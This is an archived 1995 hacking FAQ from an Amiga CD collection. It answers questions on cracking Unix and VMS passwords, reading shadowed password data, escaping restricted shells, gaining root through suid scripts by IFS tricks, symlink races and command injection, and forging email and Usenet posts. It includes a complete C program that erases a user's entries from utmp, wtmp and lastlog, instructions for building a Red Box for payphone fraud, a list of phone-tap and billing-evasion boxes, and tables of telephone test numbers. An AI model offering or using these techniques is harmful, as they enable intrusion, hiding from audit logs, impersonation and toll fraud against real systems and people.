home *** CD-ROM | disk | FTP | other *** search
/ Amiga ISO Collection / AmigaDemoCD2.iso / ASCII / TEXTE / SCENE / HPA / HACKING / INT-HACK.TXT < prev    next >
Encoding:
Text File  |  1995-03-02  |  30.5 KB  |  1,017 lines

  1. @BEGIN_FILE_ID.DIZSome useful info on hacking the Internet
  2. @END_FILE_ID.DIZ
  3.                             will@gnu.ai.mit.edu
  4.  
  5.                           With special thanks to:
  6.  
  7.               A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison,
  8.              KCrow, Presence, Rogue Agent, sbin and TheSaint.
  9.  
  10.                             Beta Revision .004
  11.  
  12.  
  13. 01. How do I access the password file under Unix?
  14. 02. How do I crack Unix passwords?
  15. 03. How do I access the password file under VMS?
  16. 04. How do I crack VMS passwords?
  17. 05. What is NIS/yp?
  18. 06. What is password shadowing?
  19. 07. How do I break out of a restricted shell?
  20. 08. How do I gain root from a suid script or program?
  21. 09. How do I erase my presence from the system logs?
  22. 10. How do I send fakemail?
  23. 11. How do I fake posts to UseNet?
  24. 12. What is a Red Box?
  25. 13. How do I build a Red Box?
  26. 14. Which payphones will a Red Box work on?
  27. 15. What is a Blue Box?
  28. 16. Do Blue Boxes still work?
  29. 17. What is a Black Box?
  30. 18. What do all the colored boxes do?
  31. 19. What are some ftp sites of interest to hackers?
  32. 20. What are some newsgroups of interest to hackers?
  33. 21. What are some telnet sites of interest to hackers?
  34. 22. What are some World wide Web (WWW) sites of interest to hackers?
  35. 23. What are some IRC channels of interest to hackers?
  36. 24. What are some BBS's of interest to hackers?
  37. 25. How do I hack ChanOp on IRC?
  38. 26. How do I modify the IRC client to hide my real username?
  39. 27. What is the ANAC number for my area?
  40. 28. What is a ringback number?
  41. 29. What is the ringback number for my area?
  42. 30. What is a loop?
  43. 31. What is a loop in my area?
  44. 32. What is a CNA number?
  45. 33. What is the telephone company CNA number for my area?
  46. 34. What does XXX stand for?
  47. 35. What is a trojan/worm/virus?
  48. 36. Where can I find more information?
  49.  
  50.  
  51.  
  52.  
  53. 01. How do I access the password file under Unix?
  54.  
  55. In standard Unix the password file is /etc/passwd.  On a Unix system
  56. with either NIS/yp or password shadowing, much of the password data
  57. may be elsewhere.
  58.  
  59.  
  60. 02. How do I crack Unix passwords?
  61.  
  62. Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
  63. passwords are encrypted with a one way function.  The login program
  64. encrypts the text you enter at the "password:" prompt and compares
  65. that encrypted string against the encrypted form of your password.
  66.  
  67. Password cracking software uses wordlists.  Each word in the wordlist
  68. is encrypted with each of the 2600 possible salt values and the
  69. results are compared to the encrypted form of the target password.
  70.  
  71. The best cracking program for Unix passwords is currently Crack by
  72. Alec Muffett.  For PC-DOS, the best package to use is currently
  73. CrackerJack.
  74.  
  75.  
  76. 03. How do I access the password file under VMS?
  77.  
  78. Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
  79. unlike Unix, most users do not have access to read the password file.
  80.  
  81.  
  82. 04. How do I crack VMS passwords?
  83.  
  84. Write a program that uses the SYS$GETUAF functions to compare the
  85. results of encrypted words against the encrypted data in SYSUAF.DAT.
  86.  
  87. Two such programs are known to exist, CHECK_PASSWORD and
  88. GUESS_PASSWORD.
  89.  
  90.  
  91. 05. What is NIS/yp?
  92.  
  93. NIS (Network Information System) in the current name for what was once
  94. known as yp (Yellow Pages).  The purpose for NIS is to allow many
  95. machies on a network to share configuration information, including
  96. password data. NIS is not designed to promote system security.  If
  97. your system uses NIS you will have a very short /etc/passwd file with
  98. a line that looks like this:
  99.  
  100. +::0:0:::
  101.  
  102. To view the real password file use this command "cd/etc;ypcat passwd"
  103.  
  104.  
  105. 06. What is password shadowing?
  106.  
  107. Password shadowing is a security system where the encrypted password
  108. field of /etc/password is replaced with a special token and the
  109. encrypted password is stored in a seperate file which is not readable
  110. by normal system users.
  111.  
  112. To defeat password shadowing on many systems, write a program that
  113. uses successive calls to getpwent() to obtain the password file.
  114.  
  115. Example:
  116.  
  117. #include <pwd.h>
  118. main()
  119. {
  120. struct passwd *p;
  121. while(p=getpwent())
  122. printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
  123. p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
  124. }
  125.  
  126.  
  127. 07. How do I break out of a restricted shell?
  128.  
  129. On poorly implemented restricted shells you can break out of the
  130. restricted environment by running a program that features a shell
  131. function.  A good example is vi.  Run vi and use this command:
  132.  
  133. :set shell=/bin/sh
  134.  
  135. then shell using this command:
  136.  
  137. :shell
  138.  
  139.  
  140. 08. How do I gain root from a suid script or program?
  141.  
  142. 1. Change IFS.
  143.  
  144. If the shell script calls any other programs using the system()
  145. function call, you may be able to fool it by changing IFS. IFS is the
  146. Internal Field Seperator that the shell uses to delimit arguments.
  147.  
  148. If the program contains a line that looks like this:
  149.  
  150. system("/bin/date")
  151.  
  152. and you change IFS to '/' the shell will them interpret the
  153. proceeding line as:
  154.  
  155. bin date
  156.  
  157. Now, if you have a program of your own in the path called "bin" the
  158. suid program will run your program instead of /bin/date.
  159.  
  160. To change IFS, use this command:
  161.  
  162. set IFS '/'
  163.  
  164.  
  165. 2. link the script to -i
  166.  
  167. Create a symbolic link named "-i" to the program.  Running "-i"
  168. will cause the interpreter shell (/bin/sh) to start up in interactive
  169. mode.  This only works on suid shell scripts.
  170.  
  171. Example:
  172.  
  173. % ln suid.sh -i
  174. % -i
  175. #
  176.  
  177.  
  178. 3. Exploit a race condition
  179.  
  180. Replace a symbolic link to the program with another program while the
  181. kernel is loading /bin/sh.
  182.  
  183. Example:
  184.  
  185. nice -19 suidprog ; ln -s evilprog suidroot
  186.  
  187.  
  188. 4. Send bad input the the program.
  189.  
  190. Invoke the name of the program and a seperate command on the same
  191. command line.
  192.  
  193. Example:
  194.  
  195. suidprog ; id
  196.  
  197.  
  198. 09. How do I erase my presence from the system logs?
  199.  
  200. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
  201. files that can be edited by hand with vi, you must use a program
  202. specifically written for this purpose.
  203.  
  204. Example:
  205.  
  206. #include <sys/types.h>
  207. #include <stdio.h>
  208. #include <unistd.h>
  209. #include <sys/file.h>
  210. #include <fcntl.h>
  211. #include <utmp.h>
  212. #include <pwd.h>
  213. #include <lastlog.h>
  214. #define WTMP_NAME "/usr/adm/wtmp"
  215. #define UTMP_NAME "/etc/utmp"
  216. #define LASTLOG_NAME "/usr/adm/lastlog"
  217.  
  218. int f;
  219.  
  220. void kill_utmp(who)
  221. char *who;
  222. {
  223.     struct utmp utmp_ent;
  224.  
  225.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  226.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  227.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  228.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  229.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  230.                  write (f, &utmp_ent, sizeof (utmp_ent));
  231.             }
  232.      close(f);
  233.   }
  234. }
  235.  
  236. void kill_wtmp(who)
  237. char *who;
  238. {
  239.     struct utmp utmp_ent;
  240.     long pos;
  241.  
  242.     pos = 1L;
  243.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  244.  
  245.      while(pos != -1L) {
  246.         lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  247.         if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  248.           pos = -1L;
  249.         } else {
  250.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  251.                bzero((char *)&utmp_ent,sizeof(struct utmp ));
  252.                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  253.                write (f, &utmp_ent, sizeof (utmp_ent));
  254.                pos = -1L;
  255.           } else pos += 1L;
  256.         }
  257.      }
  258.      close(f);
  259.   }
  260. }
  261.  
  262. void kill_lastlog(who)
  263. char *who;
  264. {
  265.     struct passwd *pwd;
  266.     struct lastlog newll;
  267.  
  268.      if ((pwd=getpwnam(who))!=NULL) {
  269.  
  270.         if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  271.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  272.             bzero((char *)&newll,sizeof( newll ));
  273.             write(f, (char *)&newll, sizeof( newll ));
  274.             close(f);
  275.         }
  276.  
  277.     } else printf("%s: ?\n",who);
  278. }
  279.  
  280. main(argc,argv)
  281. int argc;
  282. char *argv[];
  283. {
  284.     if (argc==2) {
  285.         kill_lastlog(argv[1]);
  286.         kill_wtmp(argv[1]);
  287.         kill_utmp(argv[1]);
  288.         printf("Zap2!\n");
  289.     } else
  290.     printf("Error.\n");
  291. }
  292.  
  293.  
  294. 10. How do I send fakemail?
  295.  
  296. Telnet to port 25 of the machine you want the mail to appear to
  297. originate from.  Enter your message as in this example:
  298.  
  299.  HELO bellcore.com
  300.  MAIL FROM:Voyagor@bellcore.com
  301.  RCPT TO:clinton@whitehouse.gov
  302.  DATA
  303.  
  304.         Please discontinue your silly Clipper initiative.
  305. .
  306. QUIT
  307.  
  308. On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
  309. line will not work.  Test by sending yourself fakemail first.
  310.  
  311.  
  312. 11. How do I fake posts to UseNet?
  313.  
  314. Use inews to post.  Give inews the following lines:
  315.  
  316. From:
  317. Newsgroups:
  318. Subject:
  319. Message-ID:
  320. Date:
  321. Organization:
  322.  
  323. For a moderated newsgroup, inews will also require this line:
  324.  
  325. Approved:
  326.  
  327. Then add your post and terminate with <Control-D>.
  328.  
  329. Example:
  330.  
  331. From: Dale Drew
  332. Newsgroups: alt.2600
  333. Subject: Please forgive me
  334. Message-ID: <d_drew.123@tymnet.com>
  335. Date: Fri, 13 Jun 1994 12:15:03
  336. Organization: Tymnet Insecurity
  337.  
  338. Please forgive me for being such a worthless puke all of these years.
  339.  
  340.                                                 Sincerely,
  341.  
  342.                                                         Bartman
  343. ^D
  344.  
  345.  
  346. 12. What is a Red Box?
  347.  
  348. When a coin is inserted into a payphone, the phone emits a set of
  349. tones.  A red box is a device that simulates those tones, with the
  350. purpose of fooling the payphone into believing you have inserted an
  351. actual coin.
  352.  
  353.  
  354. 13. How do I build a Red Box?
  355.  
  356. Red boxes are commonly manufactured from modified Radio Shack tone
  357. dialers, Hallmark greeting cards, or made from scratch from readily
  358. available electronic components.
  359.  
  360. To make a Red Box from a radio shack tone dialer, open the dialer and
  361. replace the crystal (the largest shiny metal component) with a crystal
  362. close to 6.5Mhz.  The most popular choice is the 6.5536Mhz crystal.
  363. When you are finished, program the P1 button with five *'s.  That will
  364. simulate a quarter tone.  Note that the tone dialer you start with
  365. must have programmable buttons.
  366.  
  367.  
  368. 14. Which payphones will a Red Box work on?
  369.  
  370. Red Boxes will work on TelCo owned payphones, but not on COCOT's
  371. (Customer Owned Coin Operated Telephones).
  372.  
  373.  
  374. 15. What is a Blue Box?
  375.  
  376. Blue boxes use a 2600hz tone to convince telephone switches that use
  377. in-band signalling that the caller is actually a telephone operator.
  378. The caller may then access special switch functions, with the usual
  379. purpose of making free long distance phone calls, using the
  380. Multi-Frequency tones provided by the Blue Box.
  381.  
  382.  
  383. 16. Do Blue Boxes still work?
  384.  
  385. Blue Boxes still work in areas using in-band signalling.  Modern phone
  386. signalling switches using ESS (Electronic Signalling Systems) use
  387. out-of-band-signalling.  Nothing you send over the voice portion of
  388. bandwidth can control the switch.
  389.  
  390.  
  391. 17. What is a Black Box?
  392.  
  393. A Black Box is a 10k ohm resistor placed across your phone line to
  394. cause the phone company equipment to be unable to detect that you have
  395. answered your telephone.  People who call you will then not be billed
  396. for the telephone call.
  397.  
  398.  
  399. 18. What do all the colored boxes do?
  400.  
  401. Acrylic      Steal Three-Way-Calling, Call Waiting and programmable Call
  402.              Forwarding on old 4-wire phone systems
  403. Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
  404. Beige        Lineman's hand set
  405. Black        Allows the calling party to not be billed for the call placed
  406. Blast        Phone microphone amplifier
  407. Blotto       Supposedly shorts every fone out in the immediate area
  408. Blue         Emulate a true operator by siezing a trunk with a 2600hz tone
  409. Brown        Create a party line from 2 phone lines
  410. Bud          Tap into your neighbors phone line
  411. Chartreuse   Use the electricity from your phone line
  412. Cheese       Connect two phones to create a divertor
  413. Chrome       Manipulate Traffic Signals by Remote Control
  414. Clear        A telephone pickup coil and a small amp use to make free
  415.              calls on Fortress Phones
  416. Color        Line activated telephone recorder
  417. Copper       Cause crosstalk interference on an extender
  418. Crimson      Hold button
  419. Dark         Re-route outgoing or incoming calls to another phone
  420. Dayglo       Connect to your neighbors phone line
  421. Divertor     Re-route outgoing or incoming calls to another phone
  422. DLOC         Create a party line from 2 phone lines
  423. Gold         Trace calls, tell if the call is being traced, and can change a tra
  424. ce
  425. Green        Emulate the Coin Collect, Coin Return, and Ringback tones
  426. Infinity     Remotely activated phone tap
  427. Jack         Touch-Tone key pad
  428. Light        In-use light
  429. Lunch        AM transmitter
  430. Magenta      Connect a remote phone line to another remote phone line
  431. Mauve        Phone tap without cutting into a line
  432. Neon         External microphone
  433. Noise        Create line noise
  434. Olive        External ringer
  435. Party        Create a party line from 2 phone lines
  436. Pearl        Tone generator
  437. Pink         Create a party line from 2 phone lines
  438. Purple       Telephone hold button
  439. Rainbow      Kill a trace by putting 120v into the phone line (uh huh..)
  440. Razz         Tap into your neighbors phone
  441. Red          Make free phone calls from pay phones by generating quarter tones
  442. Rock         Add music to your phone line
  443. Scarlet      Cause a neighbors phone line to have poor reception
  444. Silver       Create the DTMF tones for A, B, C and D
  445. Static       Keep the voltage on a phone line high
  446. Switch       Add hold, indicator lights, conferencing, etc..
  447. Tan          Line activated telephone recorder
  448. Tron         Reverse the phase of power to your house, causing your
  449.              electric meter to run slower
  450. TV Cable     "See" sound waves on your TV
  451. Urine        Create a capacitative disturbance between the ring and tip
  452.              wires in another's telephone headset
  453. Violet       Keep a payphone from hanging up
  454. White        Portable DTMF keypad
  455. Yellow       Add an extension phone
  456.  
  457.  
  458. 19. What are some ftp sites of interest to hackers?
  459.  
  460. aql.gatech.edu
  461. bellcore.com
  462. cert.org
  463. cipher.com
  464. deimos.cs.uah.edu
  465. ftp.csua.berkeley.edu   /pub/cypherpunks
  466. ftp.eff.org             /pub/cud
  467. ftp.etext.org
  468. ftp.netcom.com          /pub/bradleym
  469. ftp.netsys.com
  470. ftp.win.tue.nl
  471. garbo.uwasa.fi:pc/crypt
  472. ghost.dsi.unimi.it:/pub/crypt
  473. hack-this.pc.cc.cmu.edu
  474. halcyon.com
  475. info.cert.org
  476. ripem.msu.edu:pub/crypt
  477. rtfm.mit.edu
  478. spy.org
  479. theta.iis.u-tokyo.ac.jp /pub1/security
  480. vincent2.iastate.edu    login: anonymous.mabell /* Closed for the Summer */
  481. wimsey.bc.ca            /pub/crypto
  482.  
  483.  
  484. 20. What are some newsgroups of interest to hackers?
  485.  
  486. alt.2600
  487. alt.dcom.telecom
  488. alt.hackers
  489. alt.security.index
  490. alt.security.keydist
  491. alt.security.pgp
  492. alt.security.ripem
  493. alt.security
  494. comp.dcom.telecom       Telecommunications digest. (Moderated)
  495. comp.dcom.telecom.tech
  496. comp.org.cpsr.announce
  497. comp.org.cpsr.talk
  498. comp.org.eff
  499. comp.org.eff
  500. comp.security.announce
  501. comp.security.misc      Security issues of computers and networks.
  502. comp.security.unix
  503. comp.virus              Computer viruses & security. (Moderated)
  504. misc.security           Security in general, not just computers. (Moderated)
  505. sci.crypt               Different methods of data en/decryption.
  506.  
  507.  
  508. 21. What are some telnet sites of interest to hackers?
  509.  
  510.  
  511. 22. What are some World wide Web (WWW) sites of interest to hackers?
  512.  
  513. http://crimelab.com//bugtraq/bugtraq/html
  514. http://cs.purdue.edu/homes/spaf/coast.html
  515. http://cs.purdue.edu/homes/spaf/pcert.html
  516. http://first.org
  517. http://l0pht.com
  518. http://tamsun.tamu.edu/~clm3840/hacking.html/
  519. http://www.net23.com
  520. http://www.tnt.uni-hannover.de/stud/hamid.html
  521. http://www.spy.org /Security/Local/News
  522. http://www.phantom.com/~king
  523.  
  524.  
  525. 23. What are some IRC channels of interest to hackers?
  526.  
  527. #hack
  528. #phreak
  529. #linux
  530. #unix
  531. #warez
  532.  
  533.  
  534. 24. What are some BBS's of interest to hackers?
  535.  
  536. Home BBS        (303)343-4053
  537.  
  538.  
  539. 25. How do I hack ChanOp on IRC?
  540.  
  541. Find a server that is split from the rest of IRC and create your own
  542. channel there using the name of the channel you want ChanOp on.  When
  543. that server reconnects to the net, you will have ChanOp on the real
  544. channel.  If you have ServerOp on a server, you can cause it to split
  545. on purpose.
  546.  
  547.  
  548. 26. How do I modify the IRC client to hide my real username?
  549.  
  550. Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
  551. code files irc.c and ctcp.c.  The code you are looking for is fairly
  552. easy to spot.  Change it. Change the username code in irc.c and the
  553. ctcp information code in ctcp.c.  Compile and run your client.
  554.  
  555.  
  556. 27. What is the ANAC number for my area?
  557.  
  558. How to find your ANAC number:
  559.  
  560. Look up your NPA (Area Code) and try the number listed for it. If that
  561. fails, try 1 plus the number listed for it.  If that fails, try the
  562. common numbers like 311, 958 and 200-222-2222. If that fails, try the
  563. nationwide ANAC number 404-988-9664. If you find the ANAC number for
  564. your area, please let us know.
  565.  
  566. Note that many times the ANAC number will vary for different
  567. switches in the same city.
  568.  
  569. A trick to getting the number of the phone line you are calling from
  570. is to call (800)571-8859.  It is an 800 phone sex line. The system
  571. will give you an account number.  The first 10 digits of the account
  572. number will be the telephone number from which you are calling.
  573.  
  574. NPA  ANAC number      Comments
  575. ---  ---------------  ---------------------------------------------
  576. 201  958              Hackensack/Jersey City/Newark/Paterson, NJ
  577. 203  960              CT (All)
  578. 203  970              CT (All)
  579. 204  644-xxxx         Manitoba
  580. 205  908-222-2222     Birmingham, AL
  581. 206  411              WA /* Not US West */
  582. 207  958              ME (All)
  583. 209  830              Stockton, CA
  584. 212  958              Manhattan, NY
  585. 213  114              Los Angeles, CA
  586. 213  1223             Los Angeles, CA /* some 1AESS switches */
  587. 213  211-2345         Los Angeles, CA /* English response */
  588. 213  211-2346         Los Angeles, CA /* DTMF response */
  589. 213  61056            Los Angeles, CA
  590. 214  790              Dallas, TX /* GTE */
  591. 214  970-222-2222     Dallas, TX
  592. 214  970-611-1111     Dallas, TX /* Southwestern Bell */
  593. 215  410-xxxx         Philadelphia, PA
  594. 217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
  595. 301  958-9968         Hagerstown/Rockville, MD
  596. 305  200-222-2222     Ft. Lauderdale/Key West/Miami, FL
  597. 309  200-xxx-xxxx     Peoria/Rock Island, IL
  598. 310  114              Long Beach, CA /* on many GTE switches */
  599. 310  1223             Long Beach, CA /* some 1AESS switches */
  600. 310  211-2345         Long Beach, CA /* English response */
  601. 310  211-2346         Long Beach, CA /* DTMF response */
  602. 312  1-200-5863       Chicago, IL
  603. 312  200-xxx-xxxx     Chicago, IL
  604. 312  290              Chicago, IL
  605. 313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
  606. 313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
  607. 313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
  608. 313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
  609. 314  511              Columbia/Jefferson City, MO
  610. 317  310-222-2222     Indianapolis/Kokomo, IN
  611. 317  743-1218         Indianapolis/Kokomo, IN
  612. 401  222-2222         RI (All)
  613. 402  311              Lincoln, NE
  614. 403  311              Alberta, Yukon and N.W. Territory
  615. 403  908-222-2222     Alberta, Yukon and N.W. Territory
  616. 403  999              Alberta, Yukon and N.W. Territory
  617. 404  311              Atlanta, GA
  618. 404  940-xxx-xxxx     Atlanta, GA
  619. 405  897              Enid/Oklahoma City, OK
  620. 407  200-222-2222     Orlando/West Palm Beach, FL
  621. 408  300-xxx-xxxx     San Jose, CA
  622. 408  760              San Jose, CA
  623. 408  940              San Jose, CA
  624. 409  951              Beaumont/Galveston, TX
  625. 409  970-xxxx         Beaumont/Galveston, TX
  626. 410  200-555-1212     Annapolis/Baltimore, MD
  627. 410  811              Annapolis/Baltimore, MD
  628. 412  711-6633         Pittsburgh, PA
  629. 412  711-4411         Pittsburgh, PA
  630. 412  999-xxxx         Pittsburgh, PA
  631. 413  958              Pittsfield/Springfield, MA
  632. 413  200-555-5555     Pittsfield/Springfield, MA
  633. 414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  634. 415  200-555-1212     San Francisco, CA
  635. 415  211-2111         San Francisco, CA
  636. 415  2222             San Francisco, CA
  637. 415  640              San Francisco, CA
  638. 415  760-2878         San Francisco, CA
  639. 415  7600-2222        San Francisco, CA
  640. 419  311              Toledo, OH
  641. 502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
  642. 503  611              Portland, OR  /* not all parts of town */
  643. 508  958              Fall River/New Bedford/Worchester, MA
  644. 508  200-222-1234     Fall River/New Bedford/Worchester, MA
  645. 508  200-222-2222     Fall River/New Bedford/Worchester, MA
  646. 509  560              Spokane/Walla Walla/Yakima, WA
  647. 512  200-222-2222     Austin/Corpus Christi, TX
  648. 512  830              Austin/Corpus Christi, TX
  649. 512  970-xxxx         Austin/Corpus Christi, TX
  650. 514  320-xxxx         Montreal, Quebec
  651. 515  5463             Des Moines, IA
  652. 516  958              Hempstead/Long Island, NY
  653. 516  968              Hempstead/Long Island, NY
  654. 517  200-222-2222     Bay City/Jackson/Lansing, MI
  655. 517  200200200200200  Bay City/Jackson/Lansing, MI
  656. 518  997              Albany/Schenectady/Troy, NY
  657. 518  998              Albany/Schenectady/Troy, NY
  658. 602  593-0809         Phoenix, AZ
  659. 602  593-6017         Phoenix, AZ
  660. 602  593-7451         Phoenix, AZ
  661. 603  200-222-2222     NH (All)
  662. 606  997-555-1212     Ashland/Winchester, KY
  663. 607  993              Binghamton/Elmira, NY
  664. 609  958              Atlantic City/Camden/Trenton/Vineland, NJ
  665. 612  511              Minneapolis/St.Paul, MN
  666. 615  200200200200200  Nashville, TN
  667. 615  830              Nashville, TN
  668. 616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
  669. 617  200-222-1234     Boston, MA
  670. 617  200-222-2222     Boston, MA
  671. 617  200-444-4444     Boston, MA /* Woburn, MA */
  672. 617  220-2622         Boston, MA
  673. 617  958              Boston, MA
  674. 618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
  675. 708  1-200-xxxx       Chicago/Elgin, IL
  676. 713  970-xxxx         Houston, TX
  677. 714  211-2121         Anaheim, CA /* GTE */
  678. 716  511              Buffalo/Niagra Falls/Rochester, NY /* Rochester Tel */
  679. 717  958              Harrisburg/Scranton/Wilkes-Barre, PA
  680. 718  958              Bronx/Brooklyn/Queens/Staten Island, NY
  681. 802  2-222-222-2222   Vermont (All)
  682. 802  200-222-2222     Vermont (All)
  683. 805  830              San Luis Obispo, CA
  684. 806  970-xxxx         Amarillo/Lubbock, TX
  685. 810  200200200200200  Michigan
  686. 812  410-555-1212     Evansville, IN
  687. 815  200-xxx-xxxx     La Salle/Rockford, IL
  688. 815  290              La Salle/Rockford, IL
  689. 817  211              Ft. Worth/Waco, TX
  690. 817  970-611-1111     Ft. Worth/Waco, TX  /* Southwestern Bell */
  691. 818  1223             Pasadena, CA /* some 1AESS switches */
  692. 818  211-2345         Pasadena, CA /* English response */
  693. 818  211-2346         Pasadena, CA /* DTMF response */
  694. 906  200-222-2222     Marquette/Sault Ste. Marie, MI
  695. 908  958              New Brunswick, NJ
  696. 910  311              Fayetteville/Greensboro/Raliegh/Winston-Salem, NC
  697. 914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  698. 915  970-xxxx         Abilene/El Paso, TX
  699. 919  711              Durham, NC
  700.  
  701.  
  702. Canada:
  703. 306  115              Saskatchewan, Canada
  704. 416  410-xxxx         Toronto, Ontario
  705. 416  997-xxxx         Toronto, Ontario
  706. 519  320-xxxx         London, Ontario
  707. 604  1116             British Columbia, Canada
  708. 604  1211             British Columbia, Canada
  709. 604  211              British Columbia, Canada
  710. 613  320-2232         Ottawa, Ontario
  711. 705  320-xxxx         Saulte Ste. Marie, Ontario
  712.  
  713. Australia:
  714. +61  03-552-4111      Victoria 03 area
  715. +61  19123            All major capital cities
  716.  
  717. 28. What is a ringback number?
  718.  
  719. A ringback number is a number that you call that will immediately
  720. ring the telephone from which it was called.
  721.  
  722.  
  723. 29. What is the ringback number for my area?
  724.  
  725. 203  991-xxxx         CT (All)
  726. 209  890-xxxx         Stockton, CA
  727. 303  99X-xxxx         Grand Junction, CO
  728. 312  200-xxxx         Chicago, IL
  729. 502  988              Lexington, KY
  730. 512  95X-xxxx         Austin, TX
  731. 601  777-xxxx         MS (All)
  732. 619  331-xxxx         San Diego, CA
  733. 619  332-xxxx         San Diego, CA
  734. 716  981-xxxx         Rochester, NY /* Rochester Tel */
  735.  
  736.  
  737. 30. What is a loop?
  738.  
  739. A loop is two phone numbers connected together by the phone company
  740. for testing purposes.  A loop has a high end and a low end.  If you
  741. dial the high end, you will hear nothing.  Not even a ring.  If you
  742. dial the low end, you will hear an annoying 1,000hz tone for several
  743. seconds.  If you connect to the high end and someone dials the low
  744. end, you can speak to each other.
  745.  
  746.  
  747. 31. What is a loop in my area?
  748.  
  749. NPA    High      Low
  750. ---  --------  --------
  751. 201  228-9929  228-9930
  752. 201  238-9929  238-9930
  753. 201  251-9929  251-9930
  754. 201  254-9929  254-9930
  755. 201  272-9929  272-9930
  756. 201  330-9929  330-9930
  757. 201  333-9929  333-9930
  758. 201  339-9929  339-9930
  759. 201  347-9929  347-9930
  760. 201  376-9929  376-9930
  761. 201  398-9929  398-9930
  762. 201  467-9929  467-9930
  763. 201  528-9929  528-9930
  764. 201  558-9929  558-9930
  765. 201  559-9929  559-9930
  766. 201  560-9929  560-9930
  767. 201  592-9929  592-9930
  768. 201  625-9929  625-9930
  769. 201  631-9929  631-9930
  770. 201  637-9929  637-9930
  771. 201  655-9929  655-9930
  772. 201  666-9929  666-9930
  773. 201  690-9929  690-9930
  774. 201  761-9929  761-9930
  775. 201  762-9929  762-9929
  776. 201  762-9929  762-9930
  777. 201  762-9929  762-9929
  778. 201  763-9929  763-9930
  779. 201  764-9929  764-9930
  780. 201  767-9929  767-9930
  781. 201  768-9929  768-9930
  782. 201  773-9929  773-9930
  783. 201  879-9929  879-9930
  784. 201  946-9929  946-9930
  785. 201  992-9929  992-9930
  786. 201  993-9929  993-9930
  787. 201  994-9929  994-9930
  788. 201  994-9930
  789. 212  352-9900  352-9906
  790. 213  360-1118  360-1119
  791. 213  365-1118  365-1119
  792. 213  455-0002  455-xxxx
  793. 213  455-0002  455-XXXX
  794. 213  546-0002  546-XXXX
  795. 213  546-0002  546-xxxx
  796. 305  778-9952  778-9951
  797. 305  964-9951  964-9952
  798. 312  222-9973  222-9974
  799. 312  234-9973  234-9974
  800. 313  224-9996  224-9997
  801. 313  225-9996  225-9997
  802. 313  234-9996  234-9997
  803. 313  237-9996  237-9997
  804. 313  256-9996  256-9997
  805. 313  272-9996  272-9997
  806. 313  273-9996  273-9997
  807. 313  277-9996  277-9997
  808. 313  281-9996  281-9997
  809. 313  292-9996  292-9997
  810. 313  299-9996  299-9997
  811. 313  321-9996  321-9997
  812. 313  326-9996  326-9997
  813. 313  356-9996  356-9997
  814. 313  362-9996  362-9997
  815. 313  369-9996  369-9997
  816. 313  388-9996  388-9997
  817. 313  397-9996  397-9997
  818. 313  399-9996  399-9997
  819. 313  445-9996  445-9997
  820. 313  465-9996  465-9997
  821. 313  471-9996  471-9997
  822. 313  474-9996  474-9997
  823. 313  477-9996  477-9997
  824. 313  478-9996  478-9997
  825. 313  483-9996  483-9997
  826. 313  497-9996  497-9997
  827. 313  526-9996  526-9997
  828. 313  552-9996  552-9997
  829. 313  556-9996  556-9997
  830. 313  561-9996  561-9997
  831. 313  569-9996  569-9996
  832. 313  575-9996  575-9997
  833. 313  577-9996  577-9997
  834. 313  585-9996  585-9997
  835. 313  591-9996  591-9997
  836. 313  621-9996  621-9997
  837. 313  626-9996  626-9997
  838. 313  644-9996  644-9997
  839. 313  646-9996  646-9997
  840. 313  647-9996  647-9997
  841. 313  649-9996  649-9997
  842. 313  663-9996  663-9997
  843. 313  665-9996  665-9997
  844. 313  683-9996  683-9997
  845. 313  721-9996  721-9997
  846. 313  722-9996  722-9997
  847. 313  728-9996  728-9997
  848. 313  731-9996  731-9997
  849. 313  751-9996  751-9997
  850. 313  776-9996  776-9997
  851. 313  781-9996  781-9997
  852. 313  787-9996  787-9997
  853. 313  822-9996  822-9997
  854. 313  833-9996  833-9997
  855. 313  851-9996  851-9997
  856. 313  871-9996  871-9997
  857. 313  875-9996  875-9997
  858. 313  886-9996  886-9997
  859. 313  888-9996  888-9997
  860. 313  898-9996  898-9997
  861. 313  934-9996  934-9997
  862. 313  942-9996  942-9997
  863. 313  963-9996  963-9997
  864. 313  977-9996  977-9997
  865. 313  995-9996  995-9997
  866. 402  422-0001  422-0002
  867. 402  422-0005  422-0006
  868. 402  422-0007  422-0008
  869. 402  422-0003  422-0004
  870. 402  422-0005  422-0006
  871. 402  422-0007  422-0008
  872. 402  422-0009  ALL-PREF
  873. 402  422-0003  422-0004
  874. 402  422-0009  ALL-PREF
  875. 402  422-0001  422-0002
  876. 402  572-0003  572-0004
  877. 517  422-9996  422-9997
  878. 517  423-9996  423-9997
  879. 517  455-9996  455-9997
  880. 517  563-9996  563-9997
  881. 517  663-9996  663-9997
  882. 517  851-9996  851-9997
  883. 609  921-9929  921-9930
  884. 609  994-9929
  885. 609  994-9929  994-9930
